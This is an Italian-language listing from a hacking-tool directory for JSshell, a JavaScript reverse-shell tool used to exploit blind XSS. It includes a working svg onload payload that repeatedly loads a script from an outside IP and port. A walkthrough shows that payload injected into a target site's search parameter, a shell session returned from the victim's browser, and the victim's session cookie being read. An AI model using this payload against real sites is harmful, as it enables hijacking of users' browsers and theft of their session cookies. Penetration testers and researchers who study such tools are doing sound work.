Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
JSshell — JSshell - shell inversa/remota JavaScript | Kitploit
Strumenti/GitHubGitHub/shelld3v/jsshell
Generazione di PayloadSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubshelld3v/jsshell

JSshell

JSshell - shell inversa/remota JavaScript

Vedi Repository
6311103 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

JSshell - versione 3.1

JSshell

JSshell - una reverse shell JavaScript. Viene utilizzato per eseguire codice JS in remoto, sfruttare XSS cieco, ...

Requisiti: Qualsiasi sistema operativo + Python 2 o Python 3

Novità in JSshell versione 3.1

Aggiornato nella nuova versione di JShell 3.1:

  • Nuovo comando JSshell: snippet -> permette di scrivere uno snippet di codice javascript
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • Modalità silenziosa (per professionisti)
  • Aggiunto payload reverse shell <body>
  • Corretti alcuni bug

Utilizzo

Genera payload reverse shell JS: -g

Imposta il numero di porta locale per l'ascolto e la generazione dei payload (Predefinito: 4848): -p

Imposta l'indirizzo di origine locale per la generazione dei payload (Predefinito: rileva automaticamente il tuo indirizzo IP): -s

Imposta il timeout per la connessione shell (se l'utente esce dalla sessione, la shell rimarrà in pausa per sempre, quindi se imposti il timeout, la shell verrà chiusa dopo aver superato il timeout): -w

Esegui un comando dopo aver ottenuto la shell: -c

Esempi di utilizzo:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

Un esempio di esecuzione di JSshell:

Questo è un esempio passo passo di come utilizzare JSshell.

Per prima cosa, dobbiamo generare un payload reverse JS shell e impostare il timeout della shell (es. 20 secondi):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

Ora incolla questo payload nel sito web:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

Accedi alla pagina e avremo la reverse JS shell:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

Eseguiamo alcuni comandi:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

E verrà visualizzato un alert: controlled

root@kitploit:~
$ prompt(document.cookie)
$

E il browser mostrerà i cookie dell'utente: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

Ora usciti!

Autore

Creato da shelld3v!

Scarica lo strumento